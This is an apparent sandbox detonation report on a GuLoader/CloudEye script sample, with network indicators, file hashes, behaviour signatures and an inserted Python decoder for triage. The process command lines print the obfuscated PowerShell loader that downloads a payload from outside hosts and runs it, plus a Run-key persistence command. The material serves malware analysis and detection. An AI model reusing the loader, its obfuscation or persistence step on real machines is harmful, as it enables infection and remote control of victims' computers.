| US | 8.8.8.8:53 | moviesmacktalk.com | udp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| US | 8.8.8.8:53 | 27.218.42.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.18.190.80:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 108.216.25.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu02.duckdns.org | udp |
| US | 192.169.69.26:3980 | janbours92harbu02.duckdns.org | tcp |
| US | 192.169.69.26:3981 | janbours92harbu02.duckdns.org | tcp |
| US | 8.8.8.8:53 | janbours92harbu03.duckdns.org | udp |
| US | 8.8.8.8:53 | 26.69.169.192.in-addr.arpa | udp |
| BE | 172.111.244.38:3980 | janbours92harbu03.duckdns.org | tcp |
| BE | 172.111.244.38:3980 | janbours92harbu03.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 38.244.111.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
memory/3824-0-0x00007FF954D03000-0x00007FF954D05000-memory.dmp
memory/3824-1-0x000001FF70890000-0x000001FF708B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xevpyg1.cgr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3824-11-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/3824-12-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/3592-15-0x0000000003040000-0x0000000003076000-memory.dmp
memory/3592-16-0x0000000005CA0000-0x00000000062C8000-memory.dmp
memory/3592-17-0x0000000005AB0000-0x0000000005AD2000-memory.dmp
memory/3592-18-0x0000000005B50000-0x0000000005BB6000-memory.dmp
memory/3592-19-0x00000000062D0000-0x0000000006336000-memory.dmp
memory/3592-29-0x0000000006370000-0x00000000066C4000-memory.dmp
memory/3592-30-0x0000000006960000-0x000000000697E000-memory.dmp
memory/3592-31-0x00000000069A0000-0x00000000069EC000-memory.dmp
memory/3592-32-0x0000000008190000-0x000000000880A000-memory.dmp
memory/3592-33-0x0000000006EF0000-0x0000000006F0A000-memory.dmp
memory/3592-34-0x0000000007C30000-0x0000000007CC6000-memory.dmp
memory/3592-35-0x0000000007BC0000-0x0000000007BE2000-memory.dmp
memory/3592-36-0x0000000008DC0000-0x0000000009364000-memory.dmp
C:\Users\Admin\AppData\Roaming\Coqueluche14.myx
| MD5 | 8e72b507dadf417f0f922a8cc04533d5 |
| SHA1 | d2fb1f560d46af90f009069855dc1f94179c5b6a |
| SHA256 | 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c |
| SHA512 | cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b |
memory/3592-38-0x0000000009370000-0x000000000A320000-memory.dmp
memory/3824-40-0x00007FF954D03000-0x00007FF954D05000-memory.dmp
memory/3824-41-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/4100-48-0x00000000020E0000-0x0000000003090000-memory.dmp
memory/3824-50-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/2904-55-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3272-56-0x0000000000400000-0x0000000000462000-memory.dmp
memory/400-57-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4100-90-0x0000000003260000-0x0000000003279000-memory.dmp
memory/4100-94-0x0000000003260000-0x0000000003279000-memory.dmp
memory/4100-93-0x0000000003260000-0x0000000003279000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 18:54
Reported
2024-07-09 18:56
Platform
win7-20240708-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3068 set thread context of 1240 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
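The two powershell.exe command lines above carry every constant the loader needs (download URLs, the "User-Agent" header name, the "iex" runner, the carve offsets 370878 and 26015) through one substitution routine, Swatheable: every even-index character is filler and the loop copies the odd-index characters, but only because `$Dominator` was bumped to 1 by the `${host}.CurrentCulture` test. The following is an added triage example, not part of the report or of the sample: it ports that decoder to Python, recovers the URL list and its hosts, and mirrors the next-stage carve the script performs on the downloaded file (FromBase64String, ASCII GetString, Substring). The encoded strings are copied from the command line above; the download stand-in is constructed test data, and the assumption that Kolonialvaren.emz is base64 text comes only from how the script treats it.

```python
"""Triage helpers for the GuLoader/CloudEye PowerShell stage shown above.

Added example, not part of the sandbox report or of the sample itself.
It ports the script's string decoder (Swatheable) to Python so the C2
URL list and other constants can be recovered without running the
loader, and mirrors the next-stage carve the script performs on the
downloaded file (FromBase64String -> ASCII.GetString -> Substring).
"""
import base64
from urllib.parse import urlparse

# Encoded strings copied verbatim from the powershell.exe command line
# above. Whitespace is part of the encoding: every even-index character
# is filler, so a run of spaces collapsed by the report rendering shifts
# the parity and garbles the rest of the string (some other strings on
# this page are affected; decode from the raw .vbs or the PowerShell
# script-block log when a result looks wrong).
ENC_IEX = ' iSeOx. '
ENC_USER_AGENT = 'PU s eOrS- ADg.eSn t. '
ENC_SEPARATOR = '.>S '
ENC_URL_LIST = 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z '

# Substring(offset, length) the script applies to the decoded download
# ($Agnellis and $Underprikket in the command line above).
STAGE_OFFSET = 370878
STAGE_LENGTH = 26015


def swatheable(encoded: str, dominator: int = 1) -> str:
    """Port of the sample's Swatheable function.

    For i = 1, 3, 5, ... while i < len(encoded) - dominator, append
    Substring(i, dominator). $Dominator starts unset and is only
    incremented when $host.CurrentCulture is truthy, so on a host where
    that check fails every decode yields an empty string and the loader
    silently does nothing: a cheap emulator check, not a bug.
    """
    if dominator <= 0:
        return ''
    limit = len(encoded) - dominator
    return ''.join(encoded[i:i + dominator] for i in range(1, limit, 2))


def decode_url_list(encoded: str) -> list:
    """Recover the download URLs the way the script does: decode the
    blob, then split on the decoded separator ($Stormhat.Split($Barskt))."""
    sep = swatheable(ENC_SEPARATOR)
    return [u for u in swatheable(encoded).split(sep) if u]


def indicator_hosts(urls: list) -> list:
    """Hostnames/IPs to block or hunt for, in the loader's retry order."""
    return [urlparse(u).hostname for u in urls]


def carve_stage(b64_text: str, offset: int, length: int) -> str:
    """Mirror [Convert]::FromBase64String -> [Text.Encoding]::ASCII
    .GetString -> .Substring(offset, length).

    .NET's ASCII decoder turns every byte >= 0x80 into '?', one char per
    byte, so offsets measured on the decoded text still line up with the
    raw bytes; reproduce that rather than Python's U+FFFD replacement.
    """
    raw = base64.b64decode(b64_text)
    text = ''.join(chr(b) if b < 0x80 else '?' for b in raw)
    if offset + length > len(text):
        # .NET raises ArgumentOutOfRangeException here, so a short or
        # truncated download never reaches Invoke-Expression.
        raise ValueError('carve window %d+%d exceeds decoded size %d'
                         % (offset, length, len(text)))
    return text[offset:offset + length]


# Constructed stand-in for Kolonialvaren.emz (test data, not the real
# file): filler bytes, then a small stage at a known offset.
CONSTRUCTED_STAGE = "Write-Host 'constructed second stage'"


def make_constructed_download(offset: int = 64) -> str:
    junk = bytes((i * 7) % 251 for i in range(offset))  # includes bytes >= 0x80
    trailer = b'\x90' * 16
    return base64.b64encode(
        junk + CONSTRUCTED_STAGE.encode('ascii') + trailer).decode('ascii')


if __name__ == '__main__':
    print('expression runner :', swatheable(ENC_IEX))
    print('header name       :', swatheable(ENC_USER_AGENT))
    for url in decode_url_list(ENC_URL_LIST):
        print('download candidate:', url)
    blob = make_constructed_download()
    print('carved stage      :', carve_stage(blob, 64, len(CONSTRUCTED_STAGE)))
    # The real file would be carved with the page's own constants:
    # carve_stage(open('Kolonialvaren.emz').read(), STAGE_OFFSET, STAGE_LENGTH)
```

The decoded list is the loader's retry order: the script's `while (!$Renguera)` loop downloads from `$Otariine[$Unhermitically]`, sleeps four seconds and advances the index until the file exists under %appdata%, which is why the network table below shows moviesmacktalk.com and milanaces.com but not the remaining hosts. For the real Kolonialvaren.emz, run `carve_stage` with STAGE_OFFSET and STAGE_LENGTH; if it raises, the download was truncated or is not the base64 text the script expects.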
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | moviesmacktalk.com | udp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.18.190.80:80 | r10.o.lencr.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabA8DF.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2692-20-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
memory/2692-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/2692-23-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-22-0x0000000002390000-0x0000000002398000-memory.dmp
memory/2692-25-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-24-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-26-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-27-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CKQ750OV55N18BSWUFGX.temp
| MD5 | 9e3cc2afba423713dce0862a1e7665d2 |
| SHA1 | 0bdb1a8f2eb12e130479cc48a0c47ffb6626dcd4 |
| SHA256 | 7a2b0a49611fee20dc9456e231b724c213e46a0526bb9f8a80f7603a293cd6e3 |
| SHA512 | baa44caf9146d6a84b1ba6a688a3f71c210eac4d6fdc3c84395f2c3211b8375e28520293f000595e4d7e2de2b974f02821a41e06fa3ec5490e1438dd58e47f2d |
C:\Users\Admin\AppData\Roaming\Coqueluche14.myx
| MD5 | 8e72b507dadf417f0f922a8cc04533d5 |
| SHA1 | d2fb1f560d46af90f009069855dc1f94179c5b6a |
| SHA256 | 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c |
| SHA512 | cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b |
memory/2692-33-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-35-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-34-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
memory/3068-36-0x00000000065F0000-0x00000000075A0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6abcb26f8bccc06ba812dbffc5933a96 |
| SHA1 | 4305c908a01dd8059406a15e6b1daaeb7e20db61 |
| SHA256 | 1da0c861ce504db27e0e764d019af6adf23d5987a9498ffc6446365030793a77 |
| SHA512 | 30448bb88214cd2059ec7718ad9245d3eb0d86666ed7d2e2ff6fbe6bea582c65afe0e78c22a7aaf084b1efdc4e123eceb980ad0bf99eb7bb26aad8896e1ff2ba |
C:\Users\Admin\AppData\Local\Temp\Tar6597.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
